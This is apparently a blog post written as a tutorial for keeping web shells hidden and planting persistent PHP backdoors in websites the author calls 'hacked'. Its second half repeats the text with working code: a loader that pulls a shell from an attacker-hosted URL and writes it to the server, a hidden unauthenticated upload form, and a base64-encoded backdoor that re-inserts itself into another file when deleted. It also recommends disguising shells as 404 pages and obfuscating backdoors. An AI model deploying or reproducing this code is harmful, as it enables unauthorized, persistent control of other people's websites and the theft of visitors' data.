Shell Safety and Backdooring
Today, I will be giving a small tutorial on shell safety and backdooring your hacked websites.
I will also include some tools and code for you to use to help you on your journey.
There are many reasons for shell safety and adding a backdoor into a website that are beneficial. Here are a few.
- Keep from losing access to the site
- Keep other hackers from finding your shell
- Reupload files if the webmaster / server owners find and delete your files
- Load malware/redirect/steal cookies/etc..
So, I assume that you have a shell uploaded to a hacked server. You are sitting there, trying to figure out what you want to do with it. There are a few scenarios right off hand.
(non preferred) Deface that bastard: Well, you could ruin their index with your cheap flashing deface page with all your "greetz" to your homies and lose all your access.
(preferred) Backdoor the bitch: You could place backdoors in some of their code. Where and such depends on the code your entering.
(better than defacing but not as good as backdooring) Just leave your shell, keep url and hope it stays
So, with these options, I will stick to the preferred methods.
Lets begin with shell security.
#1 - First off, any GOOD shell will be password protected. When deciding your password, make an md5 hash of it and search for it on google. If yours can be found, choose a different path. This has let me into so many shells its rediculous.
#2 - Another good thing to have with your shell, is a basic hidden 404 page when visiting and no session has been started with it. Example: My 404 shell. This will throw people off thinking its really a page not found and such.
#3 - You also wan't to make sure your shell can't be found through text and such that shows up through dorking search engines. People will steal your shell this way.
#4 - The next important thing, is not to upload too many things, db connectors, mass defacers etc.. and when you do ALWAYS DELETE THEM AFTERWARDS. You never want to leave more than 1 shell (not even recommended, I will cover this very soon) and a backdoor.
#5 - ALWAYS make sure your shell is encoded, and hard to decode.
There are a few tips for shell security. Lets move on to backdooring, which is the best thing possible.
Backdoors are the way to go. Period. I code 90% of my backdoors in PHP. I have several different ones as they all have a different purpose. I will now give you some examples of some simple backdoors and explain their function.
#1 - Basics of a backdoor
You have 3 good options here. Insert code to be run everytime a page is visited, Do different functions via a get request, or less likely, using POST variables.
An example of having a backdoor run everytime the page is visited, could be to recreate your shell if it happen to be deleted, to log login information or something like that, which I frown upon really.
The best method for my own uses is to get it to show via get request. Example: hacked.com/hackeddir/index.php?backdoor which would then show my backdoor and let me use my options.
So, what should we have in our backdoor? Well, First I assume that you want to keep your shell on the server or recreate it when it's deleted. Lets work on this!
Lets say you have a shell and can write to the index file. hacked.com/index.php.
Here is a small example of their index.
To start a backdoor code in it. go to after the </html> tag and put in the following.
Replace the "URL TO TEXT FILE WITH SHELL CODING IN IT" with something like http://attacker.com/shell.txt
Now, the url to utilize this would be index.php?makeshell=shellname.php (replace shellname.php with what you want your file to be)
Then, you can go to hackedsite.com/shellname.php and viola! You got a shell made on the fly! Simple enough right? Lets go a little more in depth.
Say instead of making a shell, you just want ability to upload files (better than hosting a url to your shell file).
You could use the following code after </html>
The url to get this would be http://www.hacked.com/index.php?kupload ((**NOTE** I use kupload as just "upload" is used, and i want mine to be unique!))
You would be given an upload box, simply upload any file as long as its not too big, then you don't have to wory about giving away a link to a shell script or anything like that.
You can also combine both of the above, so you can quickly make a shell or upload form.
There is an unlimited amount of things you can include with this. You can make your backdoor do pretty much anything!
Another little trick, is to use two backdoors, that also remake the other backdoor incase one gets deleted. Obviously its all about how well you hide your backdoor along with how much the owner of the website really pay attention.
So how would you go about this you ask? Let me show you an example.
Say you have two files. Index.php in the main directory, admin.php in /admin/ directory.
In index.php enter this code.
Now, everytime index.php is visited, it will check for the presence of our uploader in admin.php. If its not there, it will readd it, if it is there, it does nothing.
With a little modification, you could put the same in admin.php to check index.php for the same thing. That way, its way more likely that you will keep the backdoors for as long as possible.
Also, its a very smart idea to encode all of your backdoors. The more its encoded the better.
I hope you have enjoyed this small tutorial, I plan on making a part 2 to this with more sophisticated code
Today, I will be giving a small tutorial on shell safety and backdooring your hacked websites.
I will also include some tools and code for you to use to help you on your journey.
There are many reasons for shell safety and adding a backdoor into a website that are beneficial. Here are a few.
- Keep from losing access to the site
- Keep other hackers from finding your shell
- Reupload files if the webmaster / server owners find and delete your files
- Load malware/redirect/steal cookies/etc..
So, I assume that you have a shell uploaded to a hacked server. You are sitting there, trying to figure out what you want to do with it. There are a few scenarios right off hand.
(non preferred) Deface that bastard: Well, you could ruin their index with your cheap flashing deface page with all your "greetz" to your homies and lose all your access.
(preferred) Backdoor the bitch: You could place backdoors in some of their code. Where and such depends on the code your entering.
(better than defacing but not as good as backdooring) Just leave your shell, keep url and hope it stays
So, with these options, I will stick to the preferred methods.
Lets begin with shell security.
#1 - First off, any GOOD shell will be password protected. When deciding your password, make an md5 hash of it and search for it on google. If yours can be found, choose a different path. This has let me into so many shells its rediculous.
#2 - Another good thing to have with your shell, is a basic hidden 404 page when visiting and no session has been started with it. Example: My 404 shell. This will throw people off thinking its really a page not found and such.
#3 - You also wan't to make sure your shell can't be found through text and such that shows up through dorking search engines. People will steal your shell this way.
#4 - The next important thing, is not to upload too many things, db connectors, mass defacers etc.. and when you do ALWAYS DELETE THEM AFTERWARDS. You never want to leave more than 1 shell (not even recommended, I will cover this very soon) and a backdoor.
#5 - ALWAYS make sure your shell is encoded, and hard to decode.
There are a few tips for shell security. Lets move on to backdooring, which is the best thing possible.
Backdoors are the way to go. Period. I code 90% of my backdoors in PHP. I have several different ones as they all have a different purpose. I will now give you some examples of some simple backdoors and explain their function.
#1 - Basics of a backdoor
You have 3 good options here. Insert code to be run everytime a page is visited, Do different functions via a get request, or less likely, using POST variables.
An example of having a backdoor run everytime the page is visited, could be to recreate your shell if it happen to be deleted, to log login information or something like that, which I frown upon really.
The best method for my own uses is to get it to show via get request. Example: hacked.com/hackeddir/index.php?backdoor which would then show my backdoor and let me use my options.
So, what should we have in our backdoor? Well, First I assume that you want to keep your shell on the server or recreate it when it's deleted. Lets work on this!
Lets say you have a shell and can write to the index file. hacked.com/index.php.
Here is a small example of their index.
Code:
<html>
<head>
blahsldfja
</head>
<body>
php code blah blah here
</body>
</html>To start a backdoor code in it. go to after the </html> tag and put in the following.
PHP Code:
<?phpif(isset($_GET['makeshell'])){
$filename = $_GET['makeshell'];
$shelltxt = "URL TO TEXT FILE WITH SHELL CODING IN IT";
$getcode = file_get_contents($shelltxt);
$file = fopen($filename, 'w');
fwrite($file, $getcode);
echo "Shell Created: <a href='$filename'>Link</a>";
}?>Now, the url to utilize this would be index.php?makeshell=shellname.php (replace shellname.php with what you want your file to be)
Then, you can go to hackedsite.com/shellname.php and viola! You got a shell made on the fly! Simple enough right? Lets go a little more in depth.
Say instead of making a shell, you just want ability to upload files (better than hosting a url to your shell file).
You could use the following code after </html>
PHP Code:
<?php
if(isset($_GET['kupload'])){
define("MAX_FILE_SIZE", 99999999999999999); // Maximum file size is 10 mb, 10485760 is in bytes
if(isset($_POST['submit'])) {
// Files variables
$file_name = $_FILES['file']['name']; // File name
$file_size = $_FILES['file']['size']; // File size
$file_type = $_FILES['file']['type']; // The file type, if we want to upload a determinated type of file
$file_temp = $_FILES['file']['tmp_name']; // Our temporaney file
$file_error = $_FILES['file']['error']; // The files errors
$file_dest = basename($file_name); // File destination
if ($file_size <= MAX_FILE_SIZE) {
// Uploading file
if(move_uploaded_file($file_temp, $file_dest))
{
echo 'File uploaded: '.$file_dest;
echo '<p><a href="'.$file_dest.'">go to file</a> </p>';
}
else
{
echo 'Error: '.$file_error;
}
} else {
echo "This file is too big!";
}
} else {
// Uploading form
echo '<h1>add file</h1>';
echo '<form method="post" action="" enctype="multipart/form-data">
file: <input type="file" name="file"><br /><br />
<input type="submit" name="submit" class="button" value="Upload">
</form>';
echo '</div>';
}
}?>The url to get this would be http://www.hacked.com/index.php?kupload ((**NOTE** I use kupload as just "upload" is used, and i want mine to be unique!))
You would be given an upload box, simply upload any file as long as its not too big, then you don't have to wory about giving away a link to a shell script or anything like that.
You can also combine both of the above, so you can quickly make a shell or upload form.
There is an unlimited amount of things you can include with this. You can make your backdoor do pretty much anything!
Another little trick, is to use two backdoors, that also remake the other backdoor incase one gets deleted. Obviously its all about how well you hide your backdoor along with how much the owner of the website really pay attention.
So how would you go about this you ask? Let me show you an example.
Say you have two files. Index.php in the main directory, admin.php in /admin/ directory.
In index.php enter this code.
PHP Code:
<?php
$shell2 = "admin/admin.php";$contents = file_get_contents($shell2);$pattern = '/kupload/';$bdcode = "?><?php ".base64_decode("ICBpZihpc3NldCgkX0dFVFsncHduZWQnXSkpew0KICAgIGRlZmluZSgiTUFYX0ZJTEVfU0laRSIsIDk5OTk5OTk5OTk5OTk5OTk5KTsgLy8gTWF4aW11bSBmaWxlIHNpemUgaXMgMTAgbWIsIDEwNDg1NzYwIGlzIGluIGJ5dGVzIA0KDQogICAgaWYoaXNzZXQoJF9QT1NUWydzdWJtaXQnXSkpIHsNCiAgICAgICAgLy8gRmlsZXMgdmFyaWFibGVzIA0KICAgICAgICAkZmlsZV9uYW1lICAgID0gJF9GSUxFU1snZmlsZSddWyduYW1lJ107IC8vIEZpbGUgbmFtZSANCiAgICAgICAgJGZpbGVfc2l6ZSAgICA9ICRfRklMRVNbJ2ZpbGUnXVsnc2l6ZSddOyAvLyBGaWxlIHNpemUgDQogICAgICAgICRmaWxlX3R5cGUgICAgPSAkX0ZJTEVTWydmaWxlJ11bJ3R5cGUnXTsgLy8gVGhlIGZpbGUgdHlwZSwgaWYgd2Ugd2FudCB0byB1cGxvYWQgYSBkZXRlcm1pbmF0ZWQgdHlwZSBvZiBmaWxlIA0KICAgICAgICAkZmlsZV90ZW1wICAgID0gJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddOyAvLyBPdXIgdGVtcG9yYW5leSBmaWxlIA0KICAgICAgICAkZmlsZV9lcnJvciA9ICRfRklMRVNbJ2ZpbGUnXVsnZXJyb3InXTsgLy8gVGhlIGZpbGVzIGVycm9ycyANCiAgICAgICAgJGZpbGVfZGVzdCAgICA9IGJhc2VuYW1lKCRmaWxlX25hbWUpOyAvLyBGaWxlIGRlc3RpbmF0aW9uIA0KIA0KICAgICAgICBpZiAoJGZpbGVfc2l6ZSA8PSBNQVhfRklMRV9TSVpFKSB7IA0KICAgICAgICAvLyBVcGxvYWRpbmcgZmlsZSANCiAgICAgICAgICAgIGlmKG1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZV90ZW1wLCAkZmlsZV9kZXN0KSkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBlY2hvICdGaWxlIHVwbG9hZGVkOiAnLiRmaWxlX2Rlc3Q7DQogICAgICAgICAgICAgICAgZWNobyAnPHA+PGEgaHJlZj0iJy4kZmlsZV9kZXN0LiciPmdvIHRvIGZpbGU8L2E+IDwvcD4nOw0KIA0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgZWxzZQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgIGVjaG8gJ0Vycm9yOiAnLiRmaWxlX2Vycm9yOyANCiAgICAgICAgICAgIH0NCiAgICAgICAgfSBlbHNlIHsgDQogICAgICAgICAgICBlY2hvICJUaGlzIGZpbGUgaXMgdG9vIGJpZyEiOyANCiAgICAgICAgfSANCg0KICAgIH0gZWxzZSB7IA0KICAgIA0KICAgICAgICAvLyBVcGxvYWRpbmcgZm9ybSANCiAgICAgICAgZWNobyAnPGgxPmFkZCBmaWxlPC9oMT4nOw0KICAgICAgICBlY2hvICc8Zm9ybSBtZXRob2Q9InBvc3QiIGFjdGlvbj0iIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj4gDQogICAgICAgICAgICAgIGZpbGU6IDxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIj48YnIgLz48YnIgLz4NCiAgICAgICAgICAgICAgDQogICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgY2xhc3M9ImJ1dHRvbiIgdmFsdWU9IlVwbG9hZCI+DQogICAgICAgICAgICAgIA0KICAgICAgICAgICAgICA8L2Zvcm0+JzsgDQogICAgICAgIGVjaG8gJzwvZGl2Pic7DQogICAgfSANCiAgfQ==");preg_match($pattern,$data,$match);
if(count($match)<1)
{
$file = fopen($shell2, 'a');
fwrite($file, $bdcode);
}?>Now, everytime index.php is visited, it will check for the presence of our uploader in admin.php. If its not there, it will readd it, if it is there, it does nothing.
With a little modification, you could put the same in admin.php to check index.php for the same thing. That way, its way more likely that you will keep the backdoors for as long as possible.
Also, its a very smart idea to encode all of your backdoors. The more its encoded the better.
I hope you have enjoyed this small tutorial, I plan on making a part 2 to this with more sophisticated code
0 Comments:
Post a Comment